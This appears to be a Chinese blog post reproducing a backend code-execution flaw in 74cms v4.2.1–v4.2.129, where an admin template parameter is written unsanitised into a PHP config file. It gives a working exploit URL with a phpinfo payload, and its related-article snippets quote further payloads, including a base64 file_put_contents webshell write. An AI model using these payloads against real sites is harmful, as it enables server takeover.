74cms-v4.2.1-v4.2.129-后台文件写入导致的代码执行漏洞

最新推荐文章于 2022-11-22 09:45:29 发布
最新推荐文章于 2022-11-22 09:45:29 发布
阅读量1.1k 收藏
点赞数
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/86995671
版权

参考:https://xz.aliyun.com/t/3736
后台登录状态下,访问:

 /74cms_v4.2.111/index.php?m=admin&c=tpl&a=set&tpl_dir=',phpinfo(),'

即可将payload写入Application/Home/Conf/config.php.
在这里插入图片描述
在这里插入图片描述
Application/Common/Controller/BackendController.class.php

file_put_contents($config_file, "<?php \nreturn " . stripslashes(var_export($config, true)) . ";", LOCK_EX);

又是一个由于文件写入导致的代码执行。

caiqiiqi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
74cms 5.0.1版本文件包含漏洞复现
ANYOUZHEN的博客
06-04 617
漏洞成因:由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。下载地址: 下载后解压到phpstudy的根目录www里面输入网址,http://127.0.0.1/upload/install.php一直点击下一步,输入数据库名称和密码进入系统抓个包看看将包中的domain后面的改成 base64里面的是phpinfo经过base64编码后得到的,使用bp上面的编码模块decode 然后我们点击send进行发包,看到返回后stat
74cms v5.0.1存在远程连接命令/代码执行漏洞
qq_58091216的博客
05-14 733
由于小编最近在面试找工作,所以没有时间进行更新文章,先浅更一个任意代码执行漏洞。 1.打开127.0.0.1/74cms/upload/install.php进行安装 2.使用管理员账号登陆后台,点击保存网络配置并使用burpsuite抓包。 3.之后修改site_domain(<?php phpinfo();?> base64之PD9waHAgcGhwaW5mbygpOz8+),site_domain=',file_put_contents('403.php',base6
java 远程执行linux命令_Pikachu-RCE远程命令执行漏洞
weixin_39597323的博客
11-19 340
RCE:远程代码、命令执行漏洞给攻击者向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如...
74CMS_v4.2.1-v4.2.129后台Getshell
Fly_鹏程万里
06-23 1067
影响范围 74CMS v4.2.1~v4.2.129 漏洞危害 后台Getshell 攻击类型 后台Getshell 利用条件 登陆后台 漏洞简介 74CMS管理后台在更换模板时由于模板的路径参数可控且对参数的安全性考虑不全导致该参数可控,最终攻击者可以利用该处的设计向配置文件写入一句话木马,并Getshell。 漏洞分析 漏洞触发位置为TplController.class.php文件中的set函数: 74cms_Home_Setup_v4.2.111\74c...
74cms 6.0.20版本文件包含漏洞复现
crowsec
06-08 1612
01 漏洞描述 参考资料: https://xz.aliyun.com/t/8021 由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。 下载地址: http://www.74cms.com/download/index.html 注意: 骑士cms不支持php7.x,复现php环境为php5.x即可 版本低于6.0.48 本文复现版本: 74c...
74cms v4.2.1-v4.2.129-后台getshell漏洞 复现
qq_43508668的博客
06-10 391
0x00 影响范围 v4.2.1-v4.2.129 0X01 环境搭建 74CMS官网 下载 v4.2.1-v4.2.129 0X02 漏洞复现 Payload: http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),' shell地址: http://127.0.0.1/74cms/Application/Home/Conf/config.php 路径:\74cms\up
74cms v4.2.1-v4.2.129-后台getshell漏洞复现
weixin_50887021的博客
09-19 393
74cms v4.2.1-v4.2.129-后台getshell漏洞复现下载地址漏洞复现 下载地址 http://www.74cms.com/download/index.html 漏洞复现 进入后台 http://127.0.0.1/74cms_home_setup_v4.2.111/74cms_v4.2.111/upload/index.php?m=admin&c=index&a=index 抓包,修改post值 POST /74cms_home_setup_v4.2.111/74
骑士CMS01 74cms v4.2.111 后台getshell漏洞复现
m0_63253040的博客
09-25 3166
先进入网站后台/index.php?然后访问/Application/Home/Conf/config.php。猜测账号就是admin了,貌似这里登录会验证,试试能不能爆破密码。输入账号aaa回显管理员账号不存在,试试admin。进入后台找到工具=>风格模板=>可用模板,抓包。302跳转登录成功密码就是admin。拉到最下面查看网站cms版本。修改tpl_dir的值为。蚁剑连接找到flag。
74cms 任意代码执行(CVE-2020-35339)
最新发布
weixin_44047654的博客
11-22 1158
74cms 任意代码执行(CVE-2020-35339)
74CMS_4.2.3_任意文件读取_CNVD-2017-26183
02-22
""" 声明: 本文为 漏洞编号CNVD-2017-26183 ,即 74CMS 任意文件读取漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更多介绍请访问笔者博客:0xtlu.github.io 注: 1. uid+time() 构成图片名,由于网路问题 time() 会出现一定偏差导致无法的到文件的正确名称 2. 因本工具没有设置爆破 time() 功能,故多运行几次本工具大致可以,反之,需要爆破请求的时间戳 """
最新骑士人才系统 74cms V4.2.3 单城市商业版源码分享,含3套模板,求职招聘系统源码
03-25
最新骑士人才系统 74cms V4.2.3 单城市商业版源码分享,含3套模板,求职招聘系统源码
kMaper.py:CMS 漏洞扫描器 - 基于 Exploit-DB
05-31
kMaper.py CMS 漏洞扫描器 - 基于 Exploit-DB
骑士CMSPHP人才系统源码(74cms)v4.2.111正式版
07-25
骑士cms人才系统是一项基于PHP MYSQL为核心开发的一套免费 开源专业人才招聘系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创,有着完全的知识产权。凭借骑士网络的不断创新精神和认真的工作态度,骑士人才系统已成国内同类软件中的最好用的人才系统。 骑士cms人才系统 v4.2.66 更新内容: 修正 首页滚动条只允许审核通过的显示 修正 后
74CMS漏洞打包(从老博客转)
weixin_30701575的博客
08-01 422
引子 这套CMS是上个月中做的审计,总共找到几个后台漏洞,可后台getshell,一个逻辑漏洞可任意发短信,还有一个前台注入漏洞。不过发到了某平台上之后,审核又要求我提交利用的poc,所以懒得发去了,就这里发来,刚才看了下最新版,已经修复了。版本是74cms_v3.6_20150902。 详情 逻辑漏洞 第一个逻辑漏洞是短信发送处的问题,在ajax_user.php文件中,原代码片段如下: $mo...
骑士CMS模版注入+文件包含getshell漏洞复现
锋刃科技的博客
12-22 3161
简介 骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统 漏洞概述 公告地址: http://www.74cms.com/news/show-2497.html /Application/Common/Controller/BaseController.class.php文件的assign_resume_tpl函数因为过滤不严格,导致了模板注入,可以进行远程命令执行。 影响版本 骑士 CMS < 6.0.48 环境搭建 ...
74cms前台getshell漏洞
qq_51922767的博客
12-09 997
74cms前台getshell漏洞
74cms 4.2.1-129后台getshell漏洞利用教程
74cms v4.2.1 及其后续版本 v4.2.129 存在一个后台getshell漏洞。这个漏洞出现在74cms平台的管理后台部分,由于采用了ThinkPHP框架的3.2.3版本进行重构,因此其底层逻辑与TP相关。漏洞的关键在于版本升级过程中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值